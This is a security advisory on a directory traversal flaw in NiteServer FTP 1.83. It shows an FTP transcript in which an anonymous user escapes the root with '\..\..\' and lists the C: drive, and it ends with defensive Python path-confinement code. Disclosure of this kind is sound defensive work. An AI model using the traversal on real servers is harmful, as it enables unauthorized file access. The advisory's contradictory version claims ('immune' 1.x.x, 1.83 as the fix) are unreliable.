Directory traversal vulnerabilities found in NITE ftp-server version 1.83

Discovered by Dennis Rand

------------------------------------------------------------------------

----[SUMMARY

The NiteServer is a simple FTP-Server program with some special features. It is free and easy to use. The following commands are recognized:

USER PORT RETR REST PASS STOR CWD DELE HELP LIST

so it should work with any usual ftp-client. Special Download-Ratio features are implemented. User-logins are logged with their IP-Number, so the Up/Download-Ratio will be held for the future. Spy on users and watch what they are up- or downloading. Are you interested in learning Visual Basic Internet programming? Do you need some different features? You can purchase the source-code (VB 6.0) from the Author. Simply send a check for about 25 US-$ to

A directory traversal vulnerability in the product allows remote attackers to cause the server to traverse into directories that reside outside the bounding FTP root directory.

----[DETAILS

Vulnerable systems:
Windows NT 4.0 and Windows 2000 Server, fully patched
* Niteserver Version:1.83 - Author: Thomas Krebs

Immune systems:
* NiteServer version 1.x.x

NiteServer's failure to filter out "\.." sequences in command requests allows remote users to break out of restricted directories and gain read access to the system directory structure, making it possible to discover the directory structure outside the configured areas.

The following transcript demonstrates a sample exploitation of the vulnerabilities:

Connected to 192.168.1.22.
220- Niteserver Version:1.83
220- Author: Thomas Krebs
220- email: turtie@knuut.de
220- Welcome to the Niteserver
220- First Author: Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x   1 User     Group            0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x   1 User     Group            0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x   1 User     Group            0 Dec 23 12:25 I386
drwxr-xr-x   1 User     Group            0 Dec 23 22:22 Inetpub
drwxr-xr-x   1 User     Group            0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x   1 User     Group            0 Dec 23 12:17 IO.SYS
-rwxr-xr-x   1 User     Group            0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x   1 User     Group            0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x   1 User     Group        26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x   1 User     Group       156496 Dec 23 22:30 ntldr
drwxr-xr-x   1 User     Group            0 Dec 23 12:36 OptionPack
-rwxr-xr-x   1 User     Group    134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x   1 User     Group            0 Dec 30 15:19 Program Files
drwxr-xr-x   1 User     Group            0 Dec 23 12:24 RECYCLER
drwxr-xr-x   1 User     Group            0 Dec 24 00:08 TEMP
drwxr-xr-x   1 User     Group            0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

----[DETECTION

Niteserver Version:1.83 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript.

----[VENDOR RESPONSE

Niteserver Version:1.83 fixes this issue. The latest version is available from come.to/niteserversite

----[DISCLOSURE TIMELINE

01/02/2003 Found the vulnerability.
01/02/2003 Author notified (turtie@knuut.de).
01/13/2003 No response received from turtie@knuut.de.
01/13/2003 Public disclosure.

----[ADDITIONAL INFORMATION

The vulnerability was discovered by Dennis Rand.

----[DISCLAIMER

The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
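As an added example (not code from the advisory and not NiteServer's own VB 6.0 source), the following Python shows the kind of path-confinement check the DETAILS section says was missing: both "/" and "\" are treated as separators, so a request such as `\..\..\` is seen as two parent-directory steps and refused instead of slipping past a filter that only knows "/". FTP_ROOT is the directory from the transcript; the function names are hypothetical.

```python
import ntpath

# Virtual root the server in the advisory's transcript was configured to serve.
FTP_ROOT = r"c:\ftpd\data"

class TraversalError(ValueError):
    """Raised when a client-supplied path would leave the FTP root."""

def resolve_ftp_path(root, cwd, requested):
    """Map a CWD/RETR/STOR argument to a physical path that stays under root.
    cwd is the client's current virtual directory ("/" is the FTP root). Both
    "/" and "\\" count as separators, so "\\..\\..\\" is two parent steps; a ".." above the root raises.
    """
    req = requested.replace("/", "\\")
    # An absolute virtual path starts over at the root; a relative one builds on cwd.
    base = "" if req.startswith("\\") else cwd.replace("/", "\\")
    parts = []
    for component in (base + "\\" + req).split("\\"):
        if component in ("", "."):
            continue
        if component == "..":
            if not parts:
                raise TraversalError(f"path escapes FTP root: {requested!r}")
            parts.pop()
        elif ":" in component:  # drive letters and NTFS stream syntax never belong here
            raise TraversalError(f"illegal path component: {component!r}")
        else:
            parts.append(component)
    root = ntpath.normpath(root)
    physical = ntpath.normpath(ntpath.join(root, *parts))
    # Belt and braces: containment is re-checked on the resolved physical path.
    if ntpath.commonpath([root, physical]) != root:
        raise TraversalError(f"resolved outside root: {physical!r}")
    return physical

def virtual_cwd(root, cwd, requested):
    """New "/"-rooted virtual directory to report after a successful CWD."""
    physical = resolve_ftp_path(root, cwd, requested)
    rel = physical[len(ntpath.normpath(root)):].strip("\\")
    return "/" + rel.replace("\\", "/")

def is_confined(root, cwd, requested):
    """True if the request resolves inside root; usable as a log-review predicate."""
    try:
        resolve_ftp_path(root, cwd, requested)
    except TraversalError:
        return False
    return True
```

Unlike the vulnerable server, which silently clamped `cd ..` to the root, this version rejects every request that tries to climb above it, which also makes such attempts easy to log and alert on.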